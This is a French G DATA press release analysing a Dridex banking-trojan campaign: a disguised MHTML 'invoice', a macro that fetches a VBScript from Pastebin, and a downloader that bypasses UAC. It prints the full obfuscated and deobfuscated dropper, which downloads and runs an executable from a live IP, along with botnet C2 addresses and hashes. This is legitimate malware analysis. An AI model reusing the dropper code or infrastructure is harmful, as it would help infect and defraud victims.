Annonce du 18. juin 2015

Nouveau vecteur d’infection identifié pour Dridex

Les auteurs du cheval de Troie bancaire détournent Microsoft Office, tout comme un site internet légitime pour infecter des systèmes

Les cybercriminels font preuve de créativité pour manipuler leurs cibles et contourner les produits de sécurité. Les experts du G DATA SecurityLabs ont analysé un document Microsoft Word conçu spécialement pour que les attaquants installent un cheval de Troie déjà connu nommé Dridex. Ce document malveillant se connecte à un site internet parfaitement légitime pour télécharger le payload final. Ces deux éléments ont probablement été privilégiés pour passer outre les solutions de sécurité.

L’infection expliquée par étapes

1ère étape : La campagne de spam

Cette infection commence par un spam, soit une méthode classique. Le contenu de l’email évoque un service commercial informant le destinataire d’une commande effectuée, sur le point d’être exécutée. En pièce jointe se trouve une fausse facture, un document Microsoft Office.

 

2ème étape : L’ouverture du document Microsoft

Le document est nommé YU96260LFZ.doc
SHA256 e2d878a43607c04f151052e81a560a80525a343ea4e719c3a79e1cc8c45e47c5

L’extension du nom de fichier laisse à penser que le fichier est.doc. En réalité, le fichier est un document MHTML, un format d’archive de page web légitime. Ce standard est supporté par Microsoft Word grâce à l’extension .mht. L’attaquant a probablement généré un fichier .mht et a tout simplement changé l’extension du nom de fichier en .doc. En général, les cybercriminels utilisent des extension populaires car les utilisateurs ouvrent plus facilement un type de fichier qu’ils connaissent déjà. De plus, les fichiers .mht et .doc utilisent la même icône pour paraître inoffensif. Le document contient un macro. Quand l’utilisateur ouvre le document, le message suivant apparaît :

 

Avez-vous remarqué l’avertissement sur cette capture d’écran? Toutes les exécutions macro sont désactivées, ce qui est une bonne nouvelle pour l’utilisateur.

Le contenu inscrit dans le document est illisible, comme vous pouvez le constater : trois lignes d’inepties. En fait, il s’agit de quatre lignes d’inepties car la première ligne révèle une erreur grammaticale : « you » et non « your » : « If you document has incorrect encoding – enable macro ». Une astuce pour inciter l’utilisateur à activer les macros. 

Manifestement, l’activation des macros engendre le téléchargement du code malveillant. Bien que le macro ait été obfusqué, l’URL utilisée pour le téléchargement est facilement identifiable :

paul@gdata:~/ $ oledump.py -p plugin_http_heuristics.py file.mso

   1:       541 'PROJECT'

   2:        98 'PROJECTwm'

   3: m     818 'VBA/Module2'

                Plugin: HTTP Heuristics plugin

                  Module2

   4: M    1607 'VBA/ThisDocument'

                Plugin: HTTP Heuristics plugin

                  'N\x18\xac\x0e\x87.\x99\xe9\xed'

   5:      3262 'VBA/_VBA_PROJECT'

   6:       627 'VBA/dir'

   7: M    5305

 'VBA/\xd0\xb0\xd1\x86\xd1\x83\xd0\xba34\xd0\xba\xd1\x86\xd1\x83\xd0\xbc'

                Plugin: HTTP Heuristics plugin

                 hxxp://pastebin.com/download.php?i=VTd9HVkz

 

Le site internet est Pastebin.com, un service gratuit « dans lequel il est possible de stocker du texte pour une période définie » et le partager grâce au lien vers la page. Il est utilisé généralement par des développeurs pour partager des codes source. Les attaquants ont vraisemblablement choisi cette page pour son caractère légitime et il est peu probable que les solutions de sécurité l’inscrivent dans une liste noire. Il est très facile de stocker du code sur cette plateforme, ainsi l’usage de ce site s’avère très pratique

 

3ème étape : le Payload hébergé sur Pastebin.com

Le texte est un VBS (Visual Basic Script). Le script a été obfusqué très simplement. Voici le début du code : 

dim HGyu87f7Usf: Set HGyu87f7Usf = createobject(Chr(77) & Chr(105) &

Chr(99) & Chr(114) & Chr(111) & Chr(115) & Chr(111) & Chr(102) &

Chr(116) & Chr(46) & Chr(88) & Chr(77) & Chr(76) & Chr(72) & Chr(84) &

Chr(84) & Chr(80) )

dim oUIOGuiwefff: Set oUIOGuiwefff = createobject(Chr(65) & Chr(100) &

Chr(111) & Chr(100) & Chr(98) & Chr(46) & Chr(83) & Chr(116) & Chr(114) & Chr(101) & Chr(97) & Chr(109) )

HGyu87f7Usf.Open "GET", "http://91.227.18.18/stat/get.php", False

HGyu87f7Usf.Send

Set dfgfderer = WScript.CreateObject(Chr(87) & Chr(83) & Chr(99) &

Chr(114) & Chr(105) & Chr(112) & Chr(116) & Chr(46) & Chr(83) & Chr(104) & Chr(101) & Chr(108) & Chr(108) ).Environment(Chr(80) & Chr(114) &

Chr(111) & Chr(99) & Chr(101) & Chr(115) & Chr(115) )

iyUGbuwerff = dfgfderer(Chr(65) & Chr(80) & Chr(80) & Chr(68) & Chr(65) & Chr(84) & Chr(65) )

iyUGUIvbuiwe7vhJ = iyUGbuwerff + Chr(92) & Chr(111) & Chr(56) & Chr(50) & Chr(51) & Chr(55) & Chr(52) & Chr(50) & Chr(51) & Chr(46) & Chr(101) & Chr(120) & Chr(101)

 with oUIOGuiwefff

    .type = 1 

     .open

     .write HGyu87f7Usf.responseBody

     .savetofile iyUGUIvbuiwe7vhJ, 2

 end with

Set uyGUYhi8wef = CreateObject(Chr(83) & Chr(104) & Chr(101) & Chr(108) & Chr(108) & Chr(46) & Chr(65) & Chr(112) & Chr(112) & Chr(108) &

Chr(105) & Chr(99) & Chr(97) & Chr(116) & Chr(105) & Chr(111) & Chr(110) ) uyGUYhi8wef.Open iyUGUIvbuiwe7vhJ

 

Voici le code désobfusqué :

dim HGyu87f7Usf: Set HGyu87f7Usf = createobject(Microsoft.XMLHTTP )

dim oUIOGuiwefff: Set oUIOGuiwefff = createobject(Adodb.Stream )

HGyu87f7Usf.Open "GET", "http://91.227.18.18/stat/get.php", False

HGyu87f7Usf.Send

Set dfgfderer = WScript.CreateObject(WScript.Shell ).Environment(Process )

iyUGbuwerff = dfgfderer(APPDATA )

iyUGUIvbuiwe7vhJ = iyUGbuwerff + \o8237423.exe

with oUIOGuiwefff

   .type = 1

     .open

     .write HGyu87f7Usf.responseBody

     .savetofile iyUGUIvbuiwe7vhJ, 2

 end with

 Set uyGUYhi8wef = CreateObject(Shell.Application )

 uyGUYhi8wef.Open iyUGUIvbuiwe7vhJ

 

Le VBS télécharge un exécutable (le lien /get.php), l’installe dans %APPDATA% sous le nom de o8237423.exe et l’exécute. Le lien binaire se déconnecte.

 

4ème étape : Downloader & payload

Le fichier binaire o8237423.exe  (2e6af1212a81136b46af40bf82ddd11811dc64490336f7ce1059aa9dd3c39262

) est un downloader. Avant de remplir ses fonctions, il tente d’avoir les droits administrateurs en contournant l’UAC. Le downloader utilise l’astuce répandue de cacher le popup UAC dans ce but. Il utilise un fichier .sdb sur mesure. Vous pouvez trouver plus d’information à ce sujet sur le site internet Microsoft :  https://support2.microsoft.com/en-us/kb/3045645. Le correctif mentionné est considéré par Microsoft comme facultatif. Le G DATA Security Labs vous conseille de l’appliquer pour forcer le popup UAC quand un fichier .sdb tente d’avoir les droits administrateurs.

Le payload téléchargé est un downloader pour Dridex. Plus d’informations sur Dridex dans le Malware Report : https://secure.gd/dl-en-pcmwr201402. Il se rapporte aux statistiques de Swatbanker, connu comme Geodo/Dridex, un successeur de Feodo/Cridex.

Voici la configuration d’un échantillon de Dridex :

<config

botnet_id=120

Servers= 46.36.217.227:3443, 159.253.20.116:4443, 5.44.216.44:1443, 91.218.228.25:8443

/>

L’ID du botnet ci-dessus a été analysé en avril par l’équipe Cymru ici : https://blog.team-cymru.org/2015/04/dridex-distribution-landscape/, il cible principalement la Grande Bretagne et la France. Un payload (librairie) est téléchargé depuis un des serveurs mentionnés dans la configuration. Le hash de la librairie est: 0305dda6ec81e8d8ff90152094d5e5e0f8914aeb6d984ee48d72f405a9b90f90 et correspond à un payload Dridex.

 

Conclusion

Les auteurs du malware sont dans la recherche constante d’innovations pour escroquer les utilisateurs, tout comme les solutions de sécurité. Dans ce cas, ils utilisent un site internet légitime dans le processus d’infection que les produits de sécurité n’inscriraient pas dans une liste noire.

Ils utilisent des documents Microsoft Office spécifiques pour contourner les analyses de certains antivirus. Les produits G DATA détectent ces documents.

Les cybercriminels exploitent une faiblesse de l’OS Microsoft pour devenir administrateurs sans faire apparaitre le popup UAC. Sur ce point, il est vivement conseillé d’installer le correctif Microsoft KB3045645, même si Microsoft n’estime pas qu’il s’agisse d’un correctif indispensable.

Le G DATA Security Labs répète le même message : n’ouvrez pas une pièce jointe d’email de destinataires inconnus et n’activez pas les macros dans un quelconque document inconnu.

Pendant les derniers mois, plus d’un incident ont montré que les attaquants essaye d’abuser les utilisateurs avec des documents et d’autres types de fichiers que ces derniers connaissent très bien – soit dans un contexte privé, soit professionnel. Le fait que ces documents aient une apparence inoffensive peut tromper l’utilisateur ! Soyez vigilants !

Nous tenons à remercier Bart pour son travail sur ce sujet : http://bartblaze.blogspot.fr/2015/05/new-malicious-office-docs-trick.html

Media:

Annonce du 18. juin 2015

Contact Presse

G DATA Software France SARL

Jérôme Granger

Public Relations Manager France

2A, rue Danton

92120 Montrouge

Tél: +33 (0)1 41 48 51 46

Mail: Jerome.granger@remove-this.gdata.fr